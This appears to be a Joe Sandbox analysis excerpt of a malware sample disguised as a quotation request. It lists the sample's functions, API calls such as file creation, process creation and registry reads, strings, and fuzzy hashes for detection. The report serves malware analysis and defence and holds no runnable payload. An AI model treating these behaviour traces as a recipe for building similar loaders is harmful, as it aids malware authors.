Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 7906160ea5bbe31eb03b3cb703f8bc543178255b372c8c42659f1f73253fca1d
Instruction ID: f5b60ee55ce9d81ac3bb4dafec20a87d34e89a32f0fb1470c438ea02d8aa6765
Opcode Fuzzy Hash: 7906160ea5bbe31eb03b3cb703f8bc543178255b372c8c42659f1f73253fca1d
Instruction Fuzzy Hash: 92918D7190021AAFDF05EFA8CC819EEB7B5FF14310F04486AF995BB2A1DB34A945DB50

Function 015FA768 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

Part of subcall function 015FA658: Sleep.KERNELBASE(000001F4), ref: 015FA669

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015FA892

Strings

95ZPKCH0ERZGS4Y8, xrefs: 015FA912, 015FA915

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateFileSleep
String ID: 95ZPKCH0ERZGS4Y8
API String ID: 2694422964-1159330447
Opcode ID: 4ff41629f474acf5a78c586ad27ea81696c06ff39472f57c92da6612f76858e3
Instruction ID: 791b3c28d9e13a6e1e391ff8de54d579289f43e05e6ee6f1fbe7a9d2538d0ef2
Opcode Fuzzy Hash: 4ff41629f474acf5a78c586ad27ea81696c06ff39472f57c92da6612f76858e3
Instruction Fuzzy Hash: FC519D31D04249EBEF11DBA4C855BEEBB79AF59300F00459DE608BB2C0D7B91B45CBA6

Function 00FD35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FD35A1,SwapMouseButtons,00000004,?), ref: 00FD35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FD35A1,SwapMouseButtons,00000004,?,?,?,?,00FD2754), ref: 00FD35F5
RegCloseKey.KERNELBASE(00000000,?,?,00FD35A1,SwapMouseButtons,00000004,?,?,?,?,00FD2754), ref: 00FD3617

Strings

Control Panel\Mouse, xrefs: 00FD35D2

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e204a8822caac2cba36687617491987ce2c95d173a23ab34989bb7a94dc0e3a4
Instruction ID: c5671a5a6fd2407c7fa9194cd7592a22db1f0d95654a2c01ca5c7f8475d5316e
Opcode Fuzzy Hash: e204a8822caac2cba36687617491987ce2c95d173a23ab34989bb7a94dc0e3a4
Instruction Fuzzy Hash: C9114876910208FFDB208F64D844EAFB7B9EF04750F04546AF905D7300D271DE40A761

Function 0103955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00FD4EE5: _fseek.LIBCMT ref: 00FD4EFD

Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039824
Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039837

_free.LIBCMT ref: 010396A2
_free.LIBCMT ref: 010396A9
_free.LIBCMT ref: 01039714

Part of subcall function 00FF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FF9A24), ref: 00FF2D69
Part of subcall function 00FF2D55: GetLastError.KERNEL32(00000000,?,00FF9A24), ref: 00FF2D7B

_free.LIBCMT ref: 0103971C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 4afedd58cf00ce7913c65af5796af4e147a2fb07d4db1add72a70585c1c3aa44
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: A1515EB1D04218ABDF259F64CC81AAEBBB9FF88304F04449EF649A3351DB755A80DF58

Function 00FF470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FF47A0
__flush.LIBCMT ref: 00FF47C0
__write.LIBCMT ref: 00FF47F3
__flsbuf.LIBCMT ref: 00FF4821

Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 84a10a5e1515a7a4a11fd636d2239fc07ef6499fbe990527bb19e031e6685ad0
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 1941B576E0074E9BDB189E69C8809BF7BA5AF423B0B24813DEA15C7670D774ED41EB40

Function 00FD7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100EA39
GetOpenFileNameW.COMDLG32(?), ref: 0100EA83

Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770

Part of subcall function 00FF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0

Strings

X, xrefs: 0100EA51

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: e54368b19268b78ff23ff5a072890282e63380d13d9fb24b646c4c69a9157f67
Instruction ID: 689066bcfb18092f9f17283d6c478ff1da33bb03ed297b7c20d8e4afa59cc38e
Opcode Fuzzy Hash: e54368b19268b78ff23ff5a072890282e63380d13d9fb24b646c4c69a9157f67
Instruction Fuzzy Hash: 7F21D831A042489BDB52EF94CC45BEE7BF9AF49310F04805BF548BB381DBB855899FA1

Function 01038D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 01038DAC
__fread_nolock.LIBCMT ref: 01038DC1

Strings

EA06, xrefs: 01038DF3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 1b5539ece4b80f37105524d272c6181daa3fd00629bd1254ff2193e0ddea3ef4
Instruction ID: 28c219dacfa6668c8a282566e904a5e9b12f5bf21998ddc0dd9a3335738ba6c0
Opcode Fuzzy Hash: 1b5539ece4b80f37105524d272c6181daa3fd00629bd1254ff2193e0ddea3ef4
Instruction Fuzzy Hash: 3001F9718042187EDB18DAA8CC5AEFE7BFCDF11701F00419FF692D2181E478E6048760

Function 015F9388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 015F93CD
ExitProcess.KERNEL32(00000000), ref: 015F93EC

Strings

D, xrefs: 015F9399

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction ID: 80525a1b840a6ce8150be5ca27576e04f7226db1fa2b31c3ddb688d327a0ac9b
Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction Fuzzy Hash: D4F03C7590020DABDB20EFE0CC48FEE7778BF44701F008909BB0A9A180DB7496088B61

Function 010398E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 010398F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0103990F

Strings

aut, xrefs: 01039909

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 5291de6213422bd7cc2a3526edc12be37785e9b9dbf174d48dc6235ebf2146e2
Instruction ID: 3ed883f082eb4318f2e8d3ad0da3ef950b95a87ddecc0c87d8315006a6f0b1d4
Opcode Fuzzy Hash: 5291de6213422bd7cc2a3526edc12be37785e9b9dbf174d48dc6235ebf2146e2
Instruction Fuzzy Hash: A5D05B7554030DABDB60AA90DC0DF97773CD704700F0042A1BAD495051D97555548B91

Function 0104CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a50416cec7d0993ed3e26a4449b0371402967b0dc2f08114517266a6df77736d
Instruction ID: 1e2327187577d2d8493fd558535acb842e1c41e7bb2694bb2c93463619a768a8
Opcode Fuzzy Hash: a50416cec7d0993ed3e26a4449b0371402967b0dc2f08114517266a6df77736d
Instruction Fuzzy Hash: D1F146B06083419FDB14DF28C980A6ABBE5FF88314F44896EF8999B351D774E945CF82

Function 00FDF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
Part of subcall function 00FF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
Part of subcall function 00FF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1

Part of subcall function 00FE60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FDF930), ref: 00FE6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FDF9CD
OleInitialize.OLE32(00000000), ref: 00FDFA4A
CloseHandle.KERNEL32(00000000), ref: 010145C8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 995e0edca6da6d27cfebeb7bd8367e3d5fe10e171bd3a801c63be80998465b08
Instruction ID: d041e13584f2149031e17c0b60f9426308e6d28bdf6fde8db861e83e1042a23d
Opcode Fuzzy Hash: 995e0edca6da6d27cfebeb7bd8367e3d5fe10e171bd3a801c63be80998465b08
Instruction Fuzzy Hash: 1381C0B0A052408FC7A6EF3BEC716197BE5FB9830AB50812B90D8CB359EB7E45059F51

Function 00FD434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FD4432

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 4d6820ed706dca67085618c4886ea8f1106e40a8bd932e9c4f9f21a28d4246d5
Instruction ID: 1bd867febc869b111468fc70d18209ca70299c8768170916b8c953fa9a050a7f
Opcode Fuzzy Hash: 4d6820ed706dca67085618c4886ea8f1106e40a8bd932e9c4f9f21a28d4246d5
Instruction Fuzzy Hash: C1318FB09047019FD731DF24D88469BBBE8FB49318F04096FF6DA82381E775A944DB92

Function 00FF571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00FF5733

Part of subcall function 00FFA16B: __NMSG_WRITE.LIBCMT ref: 00FFA192
Part of subcall function 00FFA16B: __NMSG_WRITE.LIBCMT ref: 00FFA19C

__NMSG_WRITE.LIBCMT ref: 00FF573A

Part of subcall function 00FFA1C8: GetModuleFileNameW.KERNEL32(00000000,010933BA,00000104,?,00000001,00000000), ref: 00FFA25A
Part of subcall function 00FFA1C8: ___crtMessageBoxW.LIBCMT ref: 00FFA308

Part of subcall function 00FF309F: ___crtCorExitProcess.LIBCMT ref: 00FF30A5
Part of subcall function 00FF309F: ExitProcess.KERNEL32 ref: 00FF30AE

Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28

RtlAllocateHeap.NTDLL(01560000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 62d60e9f73b6ee96ca8c3faa39d4145a9abd170171c19e9ef111a43720b01a7e
Instruction ID: 2f4c88bd63d68d2651d95ae1bc5e6e88ef3d7648877da3fdf51fcec915b9f9d2
Opcode Fuzzy Hash: 62d60e9f73b6ee96ca8c3faa39d4145a9abd170171c19e9ef111a43720b01a7e
Instruction Fuzzy Hash: 1301D237700B0EDAD6213B34EC52B7E7748AF82B72F210025F7059A1A1DEB898017B60

Function 010398A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01039548,?,?,?,?,?,00000004), ref: 010398BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01039548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010398D1
CloseHandle.KERNEL32(00000000,?,01039548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010398D8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 8f9aab16a74a63a887a4736f54e04e2caae8085c635a6333e754403f4c62180b
Instruction ID: 2b3bba269b4c4f23d6c26ff0802e42ef6b86f9823e9629957797859569f12c2f
Opcode Fuzzy Hash: 8f9aab16a74a63a887a4736f54e04e2caae8085c635a6333e754403f4c62180b
Instruction Fuzzy Hash: FAE08632141315B7E7312B54EC09FCB7F59AB46764F108110FB94A90D087BA15119798

Function 01038D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01038D1B

Part of subcall function 00FF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FF9A24), ref: 00FF2D69
Part of subcall function 00FF2D55: GetLastError.KERNEL32(00000000,?,00FF9A24), ref: 00FF2D7B

_free.LIBCMT ref: 01038D2C
_free.LIBCMT ref: 01038D3E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 42c748a43608b1a2133fcc58bab025b9d7f753d5fcfcf76420a9e7cea1a108b4
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 3BE0C2A160160842DBA0B57CAC45AA723DC4F887527044A8EBA4DD7152CE68F4429024

Function 00FDA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0100FC01

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 8876bcfa0660f7c050d33705043675ee7cbf61a50083f65d8615f113dab43e21
Instruction ID: ef639e47282c6f7975a7d88f41792b7835187fffbec0166894c4075d77037ab1
Opcode Fuzzy Hash: 8876bcfa0660f7c050d33705043675ee7cbf61a50083f65d8615f113dab43e21
Instruction Fuzzy Hash: EC227C71908301DFDB25DF14C490B2AB7E2BF84310F19895EE89A8B361DB35EC45EB86

Function 00FD4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD4CBA

Strings

EA06, xrefs: 0100D8CC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: f580365c54312575825e392a99bc55dccc0bf8bc1d024774815c24c412c461bc
Instruction ID: 8b88cec139b8e9d51f8f0863a584dc564f57e0c1b76f77df8cde591c28e37a9e
Opcode Fuzzy Hash: f580365c54312575825e392a99bc55dccc0bf8bc1d024774815c24c412c461bc
Instruction Fuzzy Hash: 63415B22E041586BDF229B948C917BE7FA39B45310F2C4477ED86DB382D634BD44B7A1

Function 00FD7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD7AAB
_memmove.LIBCMT ref: 00FD7B16

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
Instruction ID: 892d8d9ee9f002c130405e0f304cab68df4f25781bf3aa44630bdf9bf976635e
Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
Instruction Fuzzy Hash: D93189B6604606AFC704DF68C8D1E6DB3A5FF44320719862AE519CF3A1EB34E950DB90

Function 00FD47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00FD4834

Part of subcall function 00FF336C: __lock.LIBCMT ref: 00FF3372
Part of subcall function 00FF336C: DecodePointer.KERNEL32(00000001,?,00FD4849,01027C74), ref: 00FF337E
Part of subcall function 00FF336C: EncodePointer.KERNEL32(?,?,00FD4849,01027C74), ref: 00FF3389

Part of subcall function 00FD48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FD4915
